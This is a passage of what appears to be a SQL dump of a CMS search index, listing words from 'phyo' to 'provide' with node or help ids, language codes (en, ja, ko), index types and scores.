('phyo', 154, 'en', 'node_search', 1),
('phyo', 154, 'ja', 'node_search', 1),
('phyo', 157, 'en', 'node_search', 2),
('phyo', 157, 'ja', 'node_search', 2),
('phyo', 174, 'en', 'node_search', 2),
('phyo', 174, 'ja', 'node_search', 1.72283),
('phyo', 178, 'en', 'node_search', 2),
('phyo', 178, 'ja', 'node_search', 1.78178),
('phyoe', 171, 'en', 'node_search', 5),
('phyoe', 171, 'ja', 'node_search', 4.11692),
('phyoe', 184, 'en', 'node_search', 2),
('phyoe', 184, 'ja', 'node_search', 1.76188),
('phyoe', 188, 'en', 'node_search', 3),
('phyoe', 188, 'ja', 'node_search', 1.76188),
('phyoe', 195, 'en', 'node_search', 3),
('phyoe', 195, 'ja', 'node_search', 1.80545),
('physical', 6, 'en', 'help_search', 1),
('physical', 6, 'ja', 'help_search', 1),
('physical', 6, 'ko', 'help_search', 1),
('phyu', 77, 'en', 'node_search', 5),
('phyu', 77, 'ja', 'node_search', 5),
('phyu', 79, 'en', 'node_search', 1),
('phyu', 80, 'en', 'node_search', 5),
('phyu', 80, 'ja', 'node_search', 4.99731),
('phyu', 91, 'en', 'node_search', 2),
('phyu', 91, 'ja', 'node_search', 2),
('phyu', 92, 'en', 'node_search', 2),
('phyu', 92, 'ja', 'node_search', 2),
('phyu', 93, 'en', 'node_search', 27),
('phyu', 123, 'en', 'node_search', 28),
('phyu', 123, 'ja', 'node_search', 31),
('phyu', 134, 'en', 'node_search', 1),
('phyu', 134, 'ja', 'node_search', 1),
('phyu', 183, 'en', 'node_search', 5),
('phyu', 183, 'ja', 'node_search', 3.99983),
('piece', 11, 'en', 'help_search', 1),
('piece', 11, 'ja', 'help_search', 1),
('piece', 11, 'ko', 'help_search', 1),
('piece', 54, 'en', 'help_search', 1),
('piece', 54, 'ja', 'help_search', 1),
('piece', 54, 'ko', 'help_search', 1),
('piece', 65, 'en', 'help_search', 1),
('piece', 65, 'ja', 'help_search', 1),
('piece', 65, 'ko', 'help_search', 1),
('pieces', 29, 'en', 'help_search', 1),
('pieces', 29, 'ja', 'help_search', 1),
('pieces', 29, 'ko', 'help_search', 1),
('pipe', 37, 'en', 'help_search', 0.945829),
('pipe', 37, 'ja', 'help_search', 0.945829),
('pipe', 37, 'ko', 'help_search', 0.945829),
('pipeline', 66, 'en', 'node_search', 1),
('pixel', 6, 'en', 'help_search', 12),
('pixel', 6, 'ja', 'help_search', 12),
('pixel', 6, 'ko', 'help_search', 12),
('place', 2, 'en', 'help_search', 1),
('place', 2, 'ja', 'help_search', 1),
('place', 2, 'ko', 'help_search', 1),
('place', 3, 'en', 'help_search', 11),
('place', 3, 'ja', 'help_search', 11),
('place', 3, 'ko', 'help_search', 11),
('place', 4, 'en', 'node_search', 1),
('place', 4, 'ja', 'node_search', 1),
('place', 39, 'en', 'help_search', 22),
('place', 39, 'ja', 'help_search', 22),
('place', 39, 'ko', 'help_search', 22),
('place', 43, 'en', 'help_search', 0.997306),
('place', 43, 'ja', 'help_search', 0.997306),
('place', 43, 'ko', 'help_search', 0.997306),
('place', 45, 'en', 'help_search', 1),
('place', 45, 'ja', 'help_search', 1),
('place', 45, 'ko', 'help_search', 1),
('place', 66, 'en', 'node_search', 0.972861),
('place', 68, 'en', 'help_search', 0.813674),
('place', 68, 'ja', 'help_search', 0.813674),
('place', 68, 'ko', 'help_search', 0.813674),
('placed', 1, 'en', 'help_search', 1),
('placed', 1, 'ja', 'help_search', 1),
('placed', 1, 'ko', 'help_search', 1),
('placed', 2, 'en', 'help_search', 3),
('placed', 2, 'ja', 'help_search', 3),
('placed', 2, 'ko', 'help_search', 3),
('placed', 4, 'en', 'help_search', 1),
('placed', 4, 'ja', 'help_search', 1),
('placed', 4, 'ko', 'help_search', 1),
('placed', 14, 'en', 'help_search', 1),
('placed', 14, 'ja', 'help_search', 1),
('placed', 14, 'ko', 'help_search', 1),
('placed', 22, 'en', 'help_search', 1),
('placed', 22, 'ja', 'help_search', 1),
('placed', 22, 'ko', 'help_search', 1),
('placed', 43, 'en', 'help_search', 1),
('placed', 43, 'ja', 'help_search', 1),
('placed', 43, 'ko', 'help_search', 1),
('placeholders', 37, 'en', 'help_search', 1.87723),
('placeholders', 37, 'ja', 'help_search', 1.87723),
('placeholders', 37, 'ko', 'help_search', 1.87723),
('placing', 3, 'en', 'help_search', 26),
('placing', 3, 'ja', 'help_search', 26),
('placing', 3, 'ko', 'help_search', 26),
('placing', 29, 'en', 'help_search', 1),
('placing', 29, 'ja', 'help_search', 1),
('placing', 29, 'ko', 'help_search', 1),
('placing', 36, 'en', 'help_search', 1),
('placing', 36, 'ja', 'help_search', 1),
('placing', 36, 'ko', 'help_search', 1),
('placing', 135, 'en', 'node_search', 1),
('plain', 28, 'en', 'help_search', 1.86995),
('plain', 28, 'ja', 'help_search', 1.86995),
('plain', 28, 'ko', 'help_search', 1.86995),
('plain', 31, 'ja', 'help_search', 7.98578),
('plain', 56, 'en', 'help_search', 1),
('plain', 56, 'ja', 'help_search', 1),
('plain', 56, 'ko', 'help_search', 1),
('plaintext', 13, 'en', 'help_search', 1),
('plaintext', 13, 'ja', 'help_search', 1),
('plaintext', 13, 'ko', 'help_search', 1),
('plan', 142, 'en', 'node_search', 1),
('plays', 188, 'en', 'node_search', 1),
('please', 1, 'en', 'node_search', 1),
('please', 31, 'en', 'node_search', 0.822065),
('please', 66, 'en', 'node_search', 0.942091),
('please', 69, 'en', 'node_search', 1),
('please', 155, 'en', 'node_search', 1),
('pleased', 154, 'en', 'node_search', 1),
('pleased', 155, 'en', 'node_search', 1),
('pleased', 161, 'en', 'node_search', 1),
('pleased', 162, 'en', 'node_search', 1),
('pleased', 164, 'en', 'node_search', 1),
('pleased', 165, 'en', 'node_search', 1),
('pleased', 167, 'en', 'node_search', 1),
('pleased', 168, 'en', 'node_search', 1),
('pleased', 170, 'en', 'node_search', 1),
('pleased', 171, 'en', 'node_search', 1),
('pleased', 174, 'en', 'node_search', 1),
('pleased', 176, 'en', 'node_search', 1),
('pleased', 177, 'en', 'node_search', 1),
('pleased', 179, 'en', 'node_search', 1),
('pleased', 183, 'en', 'node_search', 1),
('pleased', 184, 'en', 'node_search', 1),
('pleased', 185, 'en', 'node_search', 1),
('pleased', 186, 'en', 'node_search', 1),
('pleased', 187, 'en', 'node_search', 1),
('pleased', 189, 'en', 'node_search', 1),
('pleased', 191, 'en', 'node_search', 1),
('pleased', 193, 'en', 'node_search', 1),
('pleased', 195, 'en', 'node_search', 1),
('pleased', 197, 'en', 'node_search', 1),
('pleased', 198, 'en', 'node_search', 1),
('plugin', 23, 'en', 'help_search', 3.44219),
('plugin', 23, 'ja', 'help_search', 3.44219),
('plugin', 23, 'ko', 'help_search', 3.44219),
('plugin', 46, 'en', 'help_search', 2),
('plugin', 46, 'ja', 'help_search', 2),
('plugin', 46, 'ko', 'help_search', 2),
('pluginbased', 46, 'en', 'help_search', 1),
('pluginbased', 46, 'ja', 'help_search', 1),
('pluginbased', 46, 'ko', 'help_search', 1),
('plugins', 46, 'en', 'help_search', 2),
('plugins', 46, 'ja', 'help_search', 2),
('plugins', 46, 'ko', 'help_search', 2),
('point', 6, 'en', 'help_search', 1),
('point', 6, 'ja', 'help_search', 1),
('point', 6, 'ko', 'help_search', 1),
('point', 48, 'en', 'help_search', 1),
('point', 48, 'ja', 'help_search', 1),
('point', 48, 'ko', 'help_search', 1),
('points', 81, 'en', 'node_search', 4),
('policy', 38, 'en', 'help_search', 13),
('policy', 38, 'ja', 'help_search', 13),
('policy', 38, 'ko', 'help_search', 13),
('polish', 62, 'en', 'node_search', 1),
('pone', 27, 'en', 'node_search', 0.731649),
('pop', 3, 'en', 'help_search', 2),
('pop', 3, 'ja', 'help_search', 2),
('pop', 3, 'ko', 'help_search', 2),
('popquiz', 142, 'en', 'node_search', 1),
('popup', 88, 'en', 'help_search', 1),
('popup', 88, 'ja', 'help_search', 1),
('popup', 88, 'ko', 'help_search', 1),
('porter', 68, 'en', 'help_search', 10.8342),
('porter', 68, 'ja', 'help_search', 10.8342),
('porter', 68, 'ko', 'help_search', 10.8342),
('position', 4, 'en', 'node_search', 1),
('position', 4, 'ja', 'node_search', 1),
('position', 10, 'en', 'node_search', 28),
('position', 10, 'ko', 'node_search', 28),
('position', 19, 'en', 'node_search', 3),
('position', 19, 'ko', 'node_search', 3),
('position', 25, 'en', 'help_search', 1),
('position', 25, 'ja', 'help_search', 1),
('position', 30, 'en', 'node_search', 2),
('position', 160, 'en', 'node_search', 2),
('position', 161, 'en', 'node_search', 2),
('position', 162, 'en', 'node_search', 31),
('position', 166, 'en', 'node_search', 5),
('position', 168, 'en', 'node_search', 2),
('position', 170, 'en', 'node_search', 5),
('position', 178, 'en', 'node_search', 2),
('position', 179, 'en', 'node_search', 2),
('position', 180, 'en', 'node_search', 2),
('position', 185, 'en', 'node_search', 2),
('position', 186, 'en', 'node_search', 2),
('position', 187, 'en', 'node_search', 2),
('position', 188, 'en', 'node_search', 2),
('position', 189, 'en', 'node_search', 5),
('position', 190, 'en', 'node_search', 2),
('position', 191, 'en', 'node_search', 2),
('position', 192, 'en', 'node_search', 2),
('position', 193, 'en', 'node_search', 2),
('position', 194, 'en', 'node_search', 2),
('position', 195, 'en', 'node_search', 2),
('position', 196, 'en', 'node_search', 2),
('position', 197, 'en', 'node_search', 2),
('position', 198, 'en', 'node_search', 2),
('position', 199, 'en', 'node_search', 2),
('positions', 1, 'en', 'help_search', 1),
('positions', 1, 'ja', 'help_search', 1),
('positions', 1, 'ko', 'help_search', 1),
('positions', 5, 'en', 'node_search', 28),
('positions', 5, 'ko', 'node_search', 28),
('positions', 162, 'en', 'node_search', 1),
('positive', 120, 'en', 'node_search', 1),
('positive', 178, 'en', 'node_search', 1),
('positive', 191, 'en', 'node_search', 1),
('positive', 194, 'en', 'node_search', 1),
('positive', 197, 'en', 'node_search', 1),
('positively', 165, 'en', 'node_search', 1),
('positively', 176, 'en', 'node_search', 1),
('possibilities', 62, 'en', 'node_search', 0.827757),
('possibilities', 66, 'en', 'node_search', 1),
('possibilities', 197, 'en', 'node_search', 28),
('possibility', 67, 'en', 'help_search', 1),
('possibility', 67, 'ja', 'help_search', 1),
('possibility', 67, 'ko', 'help_search', 1),
('possible', 6, 'en', 'help_search', 1),
('possible', 6, 'ja', 'help_search', 1),
('possible', 6, 'ko', 'help_search', 1),
('possible', 11, 'en', 'help_search', 0.920273),
('possible', 11, 'ja', 'help_search', 0.920273),
('possible', 11, 'ko', 'help_search', 0.920273),
('possible', 28, 'en', 'node_search', 1),
('possible', 76, 'en', 'help_search', 1),
('possible', 76, 'ja', 'help_search', 1),
('possible', 76, 'ko', 'help_search', 1),
('possible', 86, 'en', 'help_search', 1),
('possible', 86, 'ja', 'help_search', 1),
('possible', 86, 'ko', 'help_search', 1),
('post', 7, 'en', 'help_search', 1),
('post', 7, 'ja', 'help_search', 1),
('post', 7, 'ko', 'help_search', 1),
('post', 80, 'en', 'help_search', 1),
('post', 80, 'ja', 'help_search', 1),
('post', 80, 'ko', 'help_search', 1),
('posted', 11, 'en', 'help_search', 3),
('posted', 11, 'ja', 'help_search', 3),
('posted', 11, 'ko', 'help_search', 3),
('posting', 11, 'en', 'help_search', 0.899454),
('posting', 11, 'ja', 'help_search', 0.899454),
('posting', 11, 'ko', 'help_search', 0.899454),
('posts', 11, 'en', 'help_search', 1),
('posts', 11, 'ja', 'help_search', 1),
('posts', 11, 'ko', 'help_search', 1),
('posts', 35, 'en', 'help_search', 1),
('posts', 35, 'ja', 'help_search', 1),
('posts', 35, 'ko', 'help_search', 1),
('posts', 80, 'en', 'help_search', 1),
('posts', 80, 'ja', 'help_search', 1),
('posts', 80, 'ko', 'help_search', 1),
('potential', 120, 'en', 'node_search', 1),
('potential', 136, 'en', 'node_search', 1),
('potential', 138, 'en', 'node_search', 1),
('potentiallydangerous', 28, 'en', 'help_search', 1),
('potentiallydangerous', 28, 'ja', 'help_search', 1),
('potentiallydangerous', 28, 'ko', 'help_search', 1),
('power', 10, 'en', 'node_search', 1),
('power', 10, 'ko', 'node_search', 1),
('practical', 67, 'ja', 'node_search', 1),
('practical', 98, 'en', 'node_search', 1),
('practical', 133, 'en', 'node_search', 1),
('practical', 135, 'en', 'node_search', 2),
('practical', 136, 'en', 'node_search', 2),
('practical', 138, 'en', 'node_search', 1),
('practical', 140, 'en', 'node_search', 1),
('practical', 142, 'en', 'node_search', 1),
('practical', 198, 'en', 'node_search', 1),
('practice', 42, 'en', 'help_search', 2),
('practice', 42, 'ja', 'help_search', 2),
('practice', 42, 'ko', 'help_search', 2),
('practice', 66, 'en', 'node_search', 1),
('practice', 138, 'en', 'node_search', 1),
('practices', 24, 'en', 'node_search', 0.842342),
('practices', 24, 'ja', 'node_search', 0.474499),
('practices', 42, 'en', 'help_search', 0.993146),
('practices', 42, 'ja', 'help_search', 0.993146),
('practices', 42, 'ko', 'help_search', 0.993146),
('praised', 27, 'en', 'node_search', 0.819249),
('pratical', 98, 'en', 'node_search', 27),
('pratical', 98, 'ja', 'node_search', 27),
('pratical', 133, 'en', 'node_search', 46),
('pratical', 133, 'ja', 'node_search', 27),
('pratical', 135, 'en', 'node_search', 46),
('pratical', 135, 'ja', 'node_search', 27),
('pratical', 136, 'en', 'node_search', 46),
('pratical', 136, 'ja', 'node_search', 27),
('pratical', 138, 'en', 'node_search', 46),
('pratical', 138, 'ja', 'node_search', 27),
('pre', 27, 'en', 'node_search', 0.776703),
('precise', 87, 'en', 'node_search', 1),
('predefined', 62, 'en', 'help_search', 1),
('predefined', 62, 'ja', 'help_search', 1),
('predefined', 62, 'ko', 'help_search', 1),
('prefecture', 137, 'en', 'node_search', 1),
('prefecture', 139, 'en', 'node_search', 1),
('prefecture', 141, 'en', 'node_search', 1),
('prefecture', 162, 'en', 'node_search', 2),
('prefecture', 163, 'en', 'node_search', 2),
('prefer', 72, 'en', 'help_search', 1),
('prefer', 72, 'ja', 'help_search', 1),
('prefer', 72, 'ko', 'help_search', 1),
('preference', 162, 'en', 'node_search', 0.882818),
('preferences', 50, 'en', 'help_search', 1),
('preferences', 50, 'ja', 'help_search', 1),
('preferences', 50, 'ko', 'help_search', 1),
('preferred', 25, 'en', 'help_search', 1),
('preferred', 25, 'ja', 'help_search', 1),
('preferred', 26, 'en', 'help_search', 1),
('preferred', 26, 'ja', 'help_search', 1),
('preferred', 26, 'ko', 'help_search', 1),
('prefix', 50, 'en', 'help_search', 1),
('prefix', 50, 'ja', 'help_search', 1),
('prefix', 50, 'ko', 'help_search', 1),
('preindex', 67, 'en', 'help_search', 1),
('preindex', 67, 'ja', 'help_search', 1),
('preindex', 67, 'ko', 'help_search', 1),
('preparation', 133, 'en', 'node_search', 1),
('preparation', 155, 'en', 'node_search', 33),
('preparation', 160, 'en', 'node_search', 1),
('preparation', 161, 'en', 'node_search', 1),
('preparation', 162, 'en', 'node_search', 1),
('preparation', 165, 'en', 'node_search', 1),
('preparation', 166, 'en', 'node_search', 1),
('preparation', 168, 'en', 'node_search', 1),
('preparation', 171, 'en', 'node_search', 1),
('preparation', 174, 'en', 'node_search', 1),
('preparation', 175, 'en', 'node_search', 1),
('preparation', 176, 'en', 'node_search', 1),
('preparation', 177, 'en', 'node_search', 1),
('preparation', 178, 'en', 'node_search', 1),
('preparation', 179, 'en', 'node_search', 1),
('preparation', 184, 'en', 'node_search', 29),
('preparation', 185, 'en', 'node_search', 1),
('preparation', 186, 'en', 'node_search', 1),
('preparation', 187, 'en', 'node_search', 1),
('preparation', 188, 'en', 'node_search', 1),
('preparation', 189, 'en', 'node_search', 1),
('preparation', 190, 'en', 'node_search', 28),
('preparation', 191, 'en', 'node_search', 1),
('preparation', 192, 'en', 'node_search', 1),
('preparation', 193, 'en', 'node_search', 1),
('preparation', 194, 'en', 'node_search', 1),
('preparation', 195, 'en', 'node_search', 1),
('preparation', 196, 'en', 'node_search', 1),
('preparation', 197, 'en', 'node_search', 1),
('preparation', 199, 'en', 'node_search', 1),
('preparations', 169, 'en', 'node_search', 1),
('preparations', 173, 'en', 'node_search', 1),
('prepare', 140, 'en', 'node_search', 1),
('prepare', 155, 'en', 'node_search', 2),
('prepares', 185, 'en', 'node_search', 1),
('prepares', 193, 'en', 'node_search', 1),
('preparing', 120, 'en', 'node_search', 1),
('preparing', 138, 'en', 'node_search', 1),
('preparing', 142, 'en', 'node_search', 1),
('preparing', 161, 'en', 'node_search', 1),
('presents', 42, 'en', 'help_search', 1),
('presents', 42, 'ja', 'help_search', 1),
('presents', 42, 'ko', 'help_search', 1),
('pretend', 67, 'ja', 'node_search', 1),
('pretenseour', 135, 'en', 'node_search', 1),
('prevent', 11, 'en', 'help_search', 1),
('prevent', 11, 'ja', 'help_search', 1),
('prevent', 11, 'ko', 'help_search', 1),
('preventing', 34, 'en', 'help_search', 11),
('preventing', 34, 'ja', 'help_search', 11),
('preventing', 34, 'ko', 'help_search', 11),
('preview', 7, 'en', 'help_search', 3.89144),
('preview', 7, 'ja', 'help_search', 3.89144),
('preview', 7, 'ko', 'help_search', 3.89144),
('preview', 59, 'en', 'help_search', 5),
('preview', 59, 'ja', 'help_search', 5),
('preview', 59, 'ko', 'help_search', 5),
('preview', 91, 'en', 'help_search', 4),
('preview', 91, 'ja', 'help_search', 4),
('preview', 91, 'ko', 'help_search', 4),
('previewing', 7, 'en', 'help_search', 0.968904),
('previewing', 7, 'ja', 'help_search', 0.968904),
('previewing', 7, 'ko', 'help_search', 0.968904),
('previous', 48, 'en', 'help_search', 1),
('previous', 48, 'ja', 'help_search', 1),
('previous', 48, 'ko', 'help_search', 1),
('previous', 71, 'en', 'help_search', 1),
('previous', 71, 'ja', 'help_search', 1),
('previous', 71, 'ko', 'help_search', 1),
('previously', 1, 'en', 'help_search', 1),
('previously', 1, 'ja', 'help_search', 1),
('previously', 1, 'ko', 'help_search', 1),
('previously', 14, 'en', 'help_search', 1),
('previously', 14, 'ja', 'help_search', 1),
('previously', 14, 'ko', 'help_search', 1),
('previously', 15, 'en', 'help_search', 1),
('previously', 15, 'ja', 'help_search', 1),
('previously', 15, 'ko', 'help_search', 1),
('previously', 78, 'en', 'help_search', 1),
('previously', 78, 'ja', 'help_search', 1),
('previously', 78, 'ko', 'help_search', 1),
('previouslyplaced', 1, 'en', 'help_search', 26),
('previouslyplaced', 1, 'ja', 'help_search', 26),
('previouslyplaced', 1, 'ko', 'help_search', 26),
('previouslyplaced', 3, 'en', 'help_search', 1),
('previouslyplaced', 3, 'ja', 'help_search', 1),
('previouslyplaced', 3, 'ko', 'help_search', 1),
('price', 66, 'en', 'node_search', 1),
('pricing', 66, 'en', 'node_search', 4),
('pride', 154, 'en', 'node_search', 1),
('principles', 140, 'en', 'node_search', 1),
('printers', 6, 'en', 'help_search', 1),
('printers', 6, 'ja', 'help_search', 1),
('printers', 6, 'ko', 'help_search', 1),
('printing', 204, 'en', 'node_search', 4),
('printing', 204, 'ja', 'node_search', 4),
('priority', 98, 'en', 'node_search', 1),
('priority', 138, 'en', 'node_search', 1),
('private', 27, 'en', 'node_search', 5.4457),
('probably', 92, 'en', 'help_search', 1),
('probably', 92, 'ja', 'help_search', 1),
('probably', 92, 'ko', 'help_search', 1),
('problem', 3, 'en', 'node_search', 2),
('problem', 3, 'ko', 'node_search', 2),
('problem', 34, 'en', 'help_search', 1),
('problem', 34, 'ja', 'help_search', 1),
('problem', 34, 'ko', 'help_search', 1),
('problem', 38, 'en', 'help_search', 1),
('problem', 38, 'ja', 'help_search', 1),
('problem', 38, 'ko', 'help_search', 1),
('problem', 70, 'en', 'help_search', 1),
('problem', 70, 'ja', 'help_search', 1),
('problem', 70, 'ko', 'help_search', 1),
('problems', 34, 'en', 'help_search', 13),
('problems', 34, 'ja', 'help_search', 13),
('problems', 34, 'ko', 'help_search', 13),
('problems', 89, 'en', 'help_search', 0.993146),
('problems', 89, 'ja', 'help_search', 0.989021),
('problems', 89, 'ko', 'help_search', 0.993146),
('procedures', 160, 'en', 'node_search', 1),
('procedures', 161, 'en', 'node_search', 1),
('procedures', 166, 'en', 'node_search', 1),
('procedures', 168, 'en', 'node_search', 1),
('procedures', 170, 'en', 'node_search', 1),
('procedures', 179, 'en', 'node_search', 1),
('procedures', 180, 'en', 'node_search', 1),
('procedures', 184, 'en', 'node_search', 1),
('procedures', 188, 'en', 'node_search', 1),
('procedures', 190, 'en', 'node_search', 1),
('procedures', 192, 'en', 'node_search', 1),
('procedures', 194, 'en', 'node_search', 1),
('procedures', 196, 'en', 'node_search', 1),
('proceeds', 191, 'en', 'node_search', 1),
('proceeds', 199, 'en', 'node_search', 1),
('process', 30, 'en', 'help_search', 1.91323),
('process', 30, 'ja', 'help_search', 1.91323),
('process', 30, 'ko', 'help_search', 1.91323),
('process', 38, 'en', 'help_search', 11),
('process', 38, 'ja', 'help_search', 11),
('process', 38, 'ko', 'help_search', 11),
('process', 44, 'en', 'help_search', 2),
('process', 44, 'ja', 'help_search', 2),
('process', 44, 'ko', 'help_search', 2),
('process', 48, 'en', 'help_search', 1),
('process', 48, 'ja', 'help_search', 1),
('process', 48, 'ko', 'help_search', 1),
('process', 67, 'en', 'help_search', 1),
('process', 67, 'ja', 'help_search', 1),
('process', 67, 'ko', 'help_search', 1),
('process', 178, 'en', 'node_search', 1),
('process', 179, 'en', 'node_search', 1),
('process', 184, 'en', 'node_search', 1),
('process', 185, 'en', 'node_search', 1),
('process', 186, 'en', 'node_search', 1),
('process', 187, 'en', 'node_search', 1),
('process', 189, 'en', 'node_search', 1),
('process', 193, 'en', 'node_search', 1),
('process', 194, 'en', 'node_search', 1),
('process', 195, 'en', 'node_search', 1),
('process', 198, 'en', 'node_search', 1),
('processed', 28, 'en', 'help_search', 1),
('processed', 28, 'ja', 'help_search', 1),
('processed', 28, 'ko', 'help_search', 1),
('processing', 28, 'en', 'help_search', 4.35754),
('processing', 28, 'ja', 'help_search', 4.35754),
('processing', 28, 'ko', 'help_search', 4.35754),
('processing', 35, 'en', 'help_search', 1),
('processing', 35, 'ja', 'help_search', 1),
('processing', 35, 'ko', 'help_search', 1),
('produce', 23, 'en', 'node_search', 0.766757),
('produce', 26, 'en', 'node_search', 1),
('production', 33, 'en', 'help_search', 1),
('production', 33, 'ja', 'help_search', 1),
('production', 33, 'ko', 'help_search', 1),
('production', 72, 'en', 'help_search', 0.931053),
('production', 72, 'ja', 'help_search', 0.931053),
('production', 72, 'ko', 'help_search', 0.931053),
('products', 24, 'en', 'node_search', 0.913226),
('profession', 162, 'en', 'node_search', 1),
('profession', 188, 'en', 'node_search', 1),
('professional', 27, 'en', 'node_search', 0.989021),
('professional', 31, 'en', 'node_search', 28),
('professional', 154, 'en', 'node_search', 1),
('professional', 161, 'en', 'node_search', 1),
('professional', 164, 'en', 'node_search', 1),
('professional', 165, 'en', 'node_search', 1),
('professional', 167, 'en', 'node_search', 1),
('professional', 168, 'en', 'node_search', 1),
('professional', 169, 'en', 'node_search', 1),
('professional', 170, 'en', 'node_search', 1),
('professional', 171, 'en', 'node_search', 1),
('professional', 174, 'en', 'node_search', 1),
('professional', 175, 'en', 'node_search', 1),
('professional', 176, 'en', 'node_search', 1),
('professional', 177, 'en', 'node_search', 1),
('professional', 178, 'en', 'node_search', 1),
('professional', 180, 'en', 'node_search', 1),
('professional', 182, 'en', 'node_search', 1),
('professional', 183, 'en', 'node_search', 1),
('professional', 184, 'en', 'node_search', 1),
('professional', 185, 'en', 'node_search', 1),
('professional', 187, 'en', 'node_search', 1),
('professional', 188, 'en', 'node_search', 1),
('professional', 189, 'en', 'node_search', 1),
('professional', 190, 'en', 'node_search', 1),
('professional', 192, 'en', 'node_search', 1),
('professional', 193, 'en', 'node_search', 1),
('professional', 194, 'en', 'node_search', 2),
('professional', 196, 'en', 'node_search', 1),
('professional', 198, 'en', 'node_search', 1),
('professionally', 171, 'en', 'node_search', 1),
('professionally', 195, 'en', 'node_search', 1),
('professionally', 197, 'en', 'node_search', 1),
('professionals', 7, 'en', 'node_search', 2),
('professionals', 7, 'ko', 'node_search', 4),
('professionals', 31, 'en', 'node_search', 0.892724),
('professionals', 116, 'en', 'node_search', 1),
('proficiency', 31, 'en', 'node_search', 0.896076),
('proficiency', 136, 'en', 'node_search', 1),
('proficiency', 181, 'en', 'node_search', 1),
('proficiency', 182, 'en', 'node_search', 2),
('proficiency', 183, 'en', 'node_search', 2),
('profile', 20, 'en', 'help_search', 2),
('profile', 20, 'ja', 'help_search', 2),
('profile', 20, 'ko', 'help_search', 2),
('profile', 23, 'en', 'node_search', 27),
('profile', 30, 'en', 'help_search', 1),
('profile', 30, 'ja', 'help_search', 1),
('profile', 30, 'ko', 'help_search', 1),
('profile', 31, 'ja', 'help_search', 1),
('profile', 41, 'en', 'help_search', 1),
('profile', 41, 'ja', 'help_search', 1),
('profile', 41, 'ko', 'help_search', 1),
('profile', 65, 'en', 'help_search', 1),
('profile', 65, 'ja', 'help_search', 1),
('profile', 65, 'ko', 'help_search', 1),
('profile', 69, 'en', 'help_search', 1),
('profile', 69, 'ja', 'help_search', 1),
('profile', 69, 'ko', 'help_search', 1),
('profiles', 18, 'en', 'help_search', 2),
('profiles', 18, 'ja', 'help_search', 2),
('profiles', 18, 'ko', 'help_search', 2),
('profiles', 50, 'en', 'help_search', 1),
('profiles', 50, 'ja', 'help_search', 1),
('profiles', 50, 'ko', 'help_search', 1),
('profiles', 62, 'en', 'help_search', 1),
('profiles', 62, 'ja', 'help_search', 1),
('profiles', 62, 'ko', 'help_search', 1),
('profiles', 68, 'en', 'help_search', 1),
('profiles', 68, 'ja', 'help_search', 1),
('profiles', 68, 'ko', 'help_search', 1),
('program', 154, 'en', 'node_search', 29),
('program', 155, 'en', 'node_search', 1),
('program', 156, 'en', 'node_search', 2),
('program', 157, 'en', 'node_search', 2),
('program', 163, 'en', 'node_search', 27),
('program', 164, 'en', 'node_search', 2),
('program', 165, 'en', 'node_search', 2),
('program', 167, 'en', 'node_search', 2),
('program', 169, 'en', 'node_search', 2),
('program', 171, 'en', 'node_search', 2),
('program', 173, 'en', 'node_search', 2),
('program', 174, 'en', 'node_search', 2),
('program', 175, 'en', 'node_search', 2),
('program', 176, 'en', 'node_search', 2),
('program', 177, 'en', 'node_search', 2),
('program', 179, 'en', 'node_search', 1),
('program', 184, 'en', 'node_search', 2),
('programs', 161, 'en', 'node_search', 1),
('progress', 67, 'en', 'help_search', 7.0238),
('progress', 67, 'ja', 'help_search', 7.0238),
('progress', 67, 'ko', 'help_search', 7.0238),
('progress', 140, 'en', 'node_search', 1),
('progress', 181, 'en', 'node_search', 1),
('progress', 182, 'en', 'node_search', 4),
('progressed', 185, 'en', 'node_search', 1),
('project', 27, 'en', 'node_search', 2.70279),
('project', 30, 'en', 'node_search', 1),
('project', 38, 'en', 'help_search', 2),
('project', 38, 'ja', 'help_search', 2),
('project', 38, 'ko', 'help_search', 2),
('project', 46, 'en', 'help_search', 1),
('project', 46, 'ja', 'help_search', 1),
('project', 46, 'ko', 'help_search', 1),
('projects', 27, 'en', 'node_search', 6.57798),
('projects', 38, 'en', 'help_search', 1),
('projects', 38, 'ja', 'help_search', 1),
('projects', 38, 'ko', 'help_search', 1),
('promising', 187, 'en', 'node_search', 27),
('proper', 179, 'en', 'node_search', 1),
('protocols', 133, 'en', 'node_search', 1),
('proud', 69, 'en', 'node_search', 1),
('proud', 87, 'en', 'node_search', 1),
('proud', 156, 'en', 'node_search', 1),
('proud', 157, 'en', 'node_search', 1),
('proud', 160, 'en', 'node_search', 1),
('proud', 169, 'en', 'node_search', 1),
('proud', 173, 'en', 'node_search', 1),
('proud', 181, 'en', 'node_search', 1),
('proud', 182, 'en', 'node_search', 1),
('proud', 187, 'en', 'node_search', 1),
('proud', 190, 'en', 'node_search', 1),
('proud', 195, 'en', 'node_search', 1),
('proud', 196, 'en', 'node_search', 1),
('proud', 198, 'en', 'node_search', 1),
('proudly', 156, 'en', 'node_search', 1),
('proudly', 157, 'en', 'node_search', 1),
('provide', 6, 'en', 'help_search', 1),
('provide', 6, 'ja', 'help_search', 1),
('provide', 6, 'ko', 'help_search', 1),
('provide', 11, 'en', 'help_search', 0.972861),
('provide', 11, 'ja', 'help_search', 0.972861),
('provide', 11, 'ko', 'help_search', 0.972861),
('provide', 23, 'en', 'help_search', 1.84832),
('provide', 23, 'en', 'node_search', 0.771698),
('provide', 23, 'ja', 'help_search', 1.84832),
('provide', 23, 'ko', 'help_search', 1.84832),
('provide', 24, 'en', 'node_search', 1.68827),
('provide', 27, 'en', 'node_search', 0.805455),
('provide', 30, 'en', 'help_search', 1.38922),
('provide', 30, 'ja', 'help_search', 1.38922),
('provide', 30, 'ko', 'help_search', 1.38922),
('provide', 35, 'en', 'help_search', 2),
('provide', 35, 'ja', 'help_search', 2),
('provide', 35, 'ko', 'help_search', 2),
('provide', 43, 'en', 'help_search', 1),
('provide', 43, 'ja', 'help_search', 1),
('provide', 43, 'ko', 'help_search', 1),
('provide', 44, 'en', 'help_search', 22),
('provide', 44, 'ja', 'help_search', 22),
('provide', 44, 'ko', 'help_search', 22),
('provide', 46, 'en', 'help_search', 1),
('provide', 46, 'ja', 'help_search', 1),
('provide', 46, 'ko', 'help_search', 1),
('provide', 62, 'en', 'help_search', 2),
('provide', 62, 'ja', 'help_search', 2),
('provide', 62, 'ko', 'help_search', 2),
('provide', 65, 'en', 'help_search', 1),
('provide', 65, 'ja', 'help_search', 1),
('provide', 65, 'ko', 'help_search', 1),
('provide', 67, 'en', 'help_search', 0.98493),
('provide', 67, 'ja', 'help_search', 0.98493),
('provide', 67, 'ko', 'help_search', 0.98493),
('provide', 68, 'en', 'help_search', 22),
('provide', 68, 'ja', 'help_search', 22),
('provide', 68, 'ko', 'help_search', 22),
